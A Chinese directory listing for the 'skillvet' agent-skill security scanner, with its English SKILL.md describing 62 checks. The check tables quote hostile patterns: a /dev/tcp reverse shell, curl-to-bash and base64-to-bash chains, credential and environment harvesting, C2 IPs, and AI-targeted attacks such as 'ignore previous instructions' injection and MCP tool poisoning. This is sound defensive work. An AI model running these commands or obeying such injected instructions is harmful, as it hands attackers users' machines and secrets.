Token导航 LogoToken导航TokenDH.com
研究检索敏感数据github未标认证来源可访问许可证需确认审计提醒

skillvetskillvet 搜索

Agent Skill

skillvet 用于查找、检索和筛选相关信息,适合在 Codex、Claude、Cursor、Gemini CLI 中需要根据关键词、任务场景或来源线索快速定位候选结果时使用。可结合来源仓库、安装命令和原始 README 继续核验具体用法。安装前建议确认权限范围、维护状态,以及是否会触发联网、命令执行或文件读写。

总安装

2,570

周安装

105

GitHub Stars

1

下载量

832
CodexClaudeCursorGemini CLI

安装说明

本站只整理中文说明和来源信息,不托管安装包,也不代用户安装。

GitHub

来源数

2

许可证

unknown

最后核验

2026-05-01

来源状态

来源可访问

安装方式

通过对话安装

复制提示词发给支持本地命令或 Skills 的 AI 助手,先确认命令和权限,再让它执行。

请帮我安装这个 Agent Skill:skillvet(skillvet 搜索)
来源仓库:https://github.com/oakencore/skillvet
仓库路径:skills/skillvet
安装命令:
npx skills add https://github.com/oakencore/skillvet --skill skillvet
安装前请先检查当前环境是否支持对应 CLI,并向我确认将要执行的命令、安装目录、联网范围和文件读写权限;确认后再执行。

命令行安装

复制命令到本机终端执行。该命令会通过 npx skills 从第三方来源获取 Skill;本站只展示命令,不托管安装包,也不自动执行。

skills.shnpx skills
npx skills add https://github.com/oakencore/skillvet --skill skillvet

简介

skillvet 用于查找、检索和筛选相关信息,适合在 Codex、Claude、Cursor、Gemini CLI 中快速定位候选结果。

  • 适用于需要根据关键词或任务场景从多个来源中筛选信息的场景。
  • 通过关键词、任务场景或来源线索进行信息检索与筛选。
  • 安装命令:npx skills add https://github.com/oakencore/skillvet --skill skillvet。
  • 建议确认权限范围和维护状态,注意是否会触发联网或文件读写操作。

SKILL.md

Skillvet

Security scanner for agent skills. 62 security checks plus 8 warning categories. No dependencies — just bash and grep. Includes Tirith-inspired detection patterns, MCP server attack detection, campaign signatures from Koi Security, Bitdefender, Snyk, and 1Password ClickFix patterns.

Usage

Safe install (installs, audits, auto-removes if critical):

bash skills/skillvet/scripts/safe-install.sh <skill-slug>

Audit an existing skill:

bash skills/skillvet/scripts/skill-audit.sh skills/some-skill

Audit all installed skills:

for d in skills/*/; do bash skills/skillvet/scripts/skill-audit.sh "$d"; done

JSON output (for automation):

bash skills/skillvet/scripts/skill-audit.sh --json skills/some-skill

SARIF output (for GitHub Code Scanning / VS Code):

bash skills/skillvet/scripts/skill-audit.sh --sarif skills/some-skill

Summary mode (one-line per skill):

bash skills/skillvet/scripts/skill-audit.sh --summary skills/some-skill

Verbose mode (debug which checks run and what files are scanned):

bash skills/skillvet/scripts/skill-audit.sh --verbose skills/some-skill

Scan remote skill without installing:

bash skills/skillvet/scripts/scan-remote.sh <skill-slug>

Diff scan (only scan what changed between versions):

bash skills/skillvet/scripts/diff-scan.sh path/to/old-version path/to/new-version

Exit codes: 0 clean, 1 warnings only, 2 critical findings.

Advanced Options

FlagDescription
--jsonJSON output for CI/dashboards
--sarifSARIF v2.1.0 output for GitHub Code Scanning
--summaryOne-line output per skill
--verboseShow which checks run and which files are scanned
--exclude-selfSkip scan when scanning own source directory
--max-file-size NSkip files larger than N bytes
--max-depth NLimit directory traversal depth

Suppressing False Positives

Create a .skillvetrc file in the skill directory to disable specific checks:

# Disable check #4 (obfuscation) and #20 (shortened URLs)
disable:4
disable:20

Or add inline comments to suppress individual lines:

const url = "https://bit.ly/legit-link"; // skillvet-ignore

Pre-commit Hook

Install the git pre-commit hook to auto-scan skills before committing:

ln -sf ../../scripts/pre-commit-hook .git/hooks/pre-commit

Risk Scoring

Each finding has a severity weight (1-10). The aggregate risk score is included in JSON, SARIF, and summary output. Higher scores indicate more dangerous patterns:

  • 10: Reverse shells, known C2 IPs
  • 9: Data exfiltration, pipe-to-shell, persistence + network, ClickFix, base64 execution
  • 7-8: Credential theft, obfuscation, path traversal, time bombs
  • 4-6: Punycode, homographs, ANSI injection, shortened URLs
  • 2-3: Subprocess execution, network requests, file writes

Critical Checks (auto-blocked)

Core Security Checks (1-24)

#CheckExample
1Known exfiltration endpointswebhook.site, ngrok.io, requestbin
2Bulk env variable harvesting`printenv \, ${!*@}`
3Foreign credential accessANTHROPIC_API_KEY, TELEGRAM_BOT_TOKEN in scripts
4Code obfuscationbase64 decode, hex escapes, dynamic code generation
5Path traversal / sensitive files../../, ~/.ssh, ~/.clawdbot
6Data exfiltration via curl/wgetcurl --data, wget --post with variables
7Reverse/bind shells/dev/tcp/, nc -e, socat
8.env file theftdotenv loading in scripts (not docs)
9Prompt injection in markdown"ignore previous instructions" in SKILL.md
10LLM tool exploitationInstructions to send/email secrets
11Agent config tamperingWrite/modify AGENTS.md, SOUL.md, clawdbot.json
12Unicode obfuscationZero-width chars, RTL override, bidi control chars
13Suspicious setup commandscurl piped to bash in SKILL.md
14Social engineeringDownload external binaries, paste-and-run instructions
15Shipped.env files.env files (not.example) in the skill
16Homograph URLs *(Tirith)*Cyrillic i vs Latin i in hostnames
17ANSI escape sequences *(Tirith)*Terminal escape codes in code/data files
18Punycode domains *(Tirith)*xn-- prefixed IDN-encoded domains
19Double-encoded paths *(Tirith)*%25XX percent-encoding bypass
20Shortened URLs *(Tirith)*bit.ly, t.co, tinyurl.com hiding destinations
21Pipe-to-shell`curl \bash` (HTTP and HTTPS)
22String construction evasionString.fromCharCode, getattr, dynamic call assembly
23Data flow chain analysisSame file reads secrets, encodes, AND sends network requests
24Time bomb detectionDate.now() > timestamp, setTimeout(fn, 86400000)
25Known C2/IOC IP blocklist91.92.242.30, 54.91.154.110 (known AMOS C2 servers)
26Password-protected archives"extract using password: openclaw" — AV evasion
27Paste service payloadsglot.io, pastebin.com hosting malicious scripts
28GitHub releases binary downloadsFake prerequisites pointing to .zip/.exe on GitHub
29Base64 pipe-to-interpreter`echo '...' \base64 -D \bash` — primary macOS vector
30Subprocess + network commandshidden pipe-to-shell in Python/JS code
31Fake URL misdirection *(warning)*decoy URL before real payload
32Process persistence + networknohup curl... & — backdoor with network access
33Fake prerequisite pattern"Prerequisites" section with sketchy external downloads
34xattr/chmod droppermacOS Gatekeeper bypass: download, xattr -c, chmod +x, execute
35ClickFix download+execute chaincurl -o /tmp/x && chmod +x &&./x, open -a with downloads
36Suspicious package sourcespip install git+https://..., npm from non-official registries
37Staged installer patternFake dependency names like openclaw-core, some-lib
38Fake OS update social engineering"Apple Software Update required for compatibility"
39Known malicious ClawHub actorszaycv, Ddoy233, Sakaen736jih, Hightower6eu references
40Bash /dev/tcp reverse shellbash -i >/dev/tcp/IP/PORT 0>&1 (AuthTool pattern)
41Nohup backdoornohup bash -c '...' >/dev/null with network commands
42Python reverse shellsocket.connect + dup2, pty.spawn('/bin/bash')
43Terminal output disguiseDecoy "downloading..." message before malicious payload
44Credential file accessDirect reads of .env, .pem, .aws/credentials
45TMPDIR payload stagingAMOS pattern: drop malware to $TMPDIR then execute
46GitHub raw content execution`curl raw.githubusercontent.com/... \bash`
47Echo-encoded payloadsLong base64 strings echoed and piped to decoders
48Typosquat skill namesclawdhub-helper, openclaw-cli, skillvet1

Tirith-Inspired Security Checks (#49-54)

Based on Tirith policy-as-code patterns for detecting advanced obfuscation and credential abuse.

#CheckSeverityExample
49Homograph URL detection9Cyrillic/Greek lookalike chars in URLs (e.g., а vs a)
50Zero-width / invisible Unicode8U+200B, U+200D, bidi overrides hiding malicious content
51Punycode domain detection9xn-- IDN-encoded domains masquerading as legitimate
52Credentials in URL7https://user:pass@host — passwords exposed in URLs
53Dotfile targeting9Writes to .bashrc, .ssh/authorized_keys, .gitconfig
54URL shortener obfuscation7Shortened URLs hiding malicious destinations

MCP Security Checks (#55-62)

Based on Invariant Labs, Trail of Bits, Keysight, and Snyk research on MCP server attack vectors.

#CheckSeverityExample
55MCP tool poisoning instructions9"description": "ignore previous instructions and..."
56Cross-server tool shadowing8"when using send_email, always BCC..."
57Conversation history exfiltration9conversation_history parameter, when you see API_KEY
58Command injection in MCP handlers8Template literal in shell exec, subprocess with shell=True
59Bulk environment exfiltration9JSON.stringify(process.env), dict(os.environ)
60Cloud metadata SSRF9169.254.169.254, metadata.google.internal
61DNS rebinding exposure (warning)6Server binding to 0.0.0.0 with SSE transport
62Rug pull / dynamic tool definitions8Date.now() near tool registration, remote tool fetching

Warning Checks (flagged for review)

#CheckExample
W1Unknown external tool requirementsNon-standard CLI tools in install instructions
W2Subprocess executionchild_process, execSync, spawn, subprocess
W3Network requestsaxios, fetch, requests imports
W4Minified/bundled filesFirst line >500 chars — can't audit
W5Filesystem write operationswriteFile, open('w'), fs.append
W6Insecure transportcurl -k, verify=False — TLS disabled
W7Docker untrusted registriesNon-standard image sources

Scanned File Types

.md, .js, .ts, .tsx, .jsx, .py, .sh, .bash, .rs, .go, .rb, .c, .cpp, .json, .yaml, .yml, .toml, .txt, .env*, Dockerfile*, Makefile, pom.xml, .gradle.

Binary files are automatically skipped. Symlinks are followed.

Portability

Works on Linux and macOS. Unicode checks (#12, #16, #17) use grep -P where available, falling back to perl on systems without Perl-compatible regex (e.g., stock macOS). If neither is available, those checks are silently skipped.

IOC Updates

The C2 IP blocklist in check #25 is based on known indicators from:

To update IOCs, edit the KNOWN_IPS entry in scripts/patterns.b64 (base64-encoded regex pattern).

CI/CD Integration

GitHub Actions

A .github/workflows/test.yml is included — runs the test suite on both Ubuntu and macOS on push/PR.

GitHub Code Scanning (SARIF)

- name: Run skillvet
  run: bash scripts/skill-audit.sh --sarif skills/some-skill > results.sarif || true

- name: Upload SARIF
  uses: github/codeql-action/upload-sarif@v3
  with:
    sarif_file: results.sarif

Limitations

Static analysis only. English-centric prompt injection patterns. Minified JS is flagged but not deobfuscated. A clean scan raises the bar but doesn't guarantee safety.

The scanner flags itself when audited — its own patterns contain the strings it detects. Use --exclude-self to skip self-scanning in CI.

适合场景

01

用户想查找某类 Agent Skill 时

02

需要根据任务场景推荐可安装能力包时

03

需要对比不同来源的安装命令和来源信息时

能力概览

能力 1

按任务关键词查找相关 Skills

能力 2

展示可复制的安装命令

能力 3

保留来源站点、仓库和原始说明,方便继续核验

能力 4

展示第三方安全扫描或审计结果

安装后应在对应宿主中按原始 README 的触发条件使用;具体调用方式请以来源页面和 README 为准。

平台分布

Codex

36.91%
按下载量换算307

Claude

29.54%
按下载量换算246

Cursor

16.58%
按下载量换算138

Gemini CLI

8.42%
按下载量换算70

安全审计

Gen Agent Trust Hub

通过

Socket

通过

Snyk

可疑

权限和风险

敏感数据

该 Skill 可能接触密钥、Token、环境变量或敏感配置,应进入高风险复核队列,默认不自动发布。

安装前确认

本站仅展示第三方公开信息,不托管安装包,不提供自动安装或运行环境。安装前应自行审查源码、依赖和命令行为。来源安全扫描存在 warning/failed 结果,不能写成本站确认安全。当前只有一个来源,正式发布前建议补源仓库或其他目录站核验。

来源信息

继续浏览同类 Skills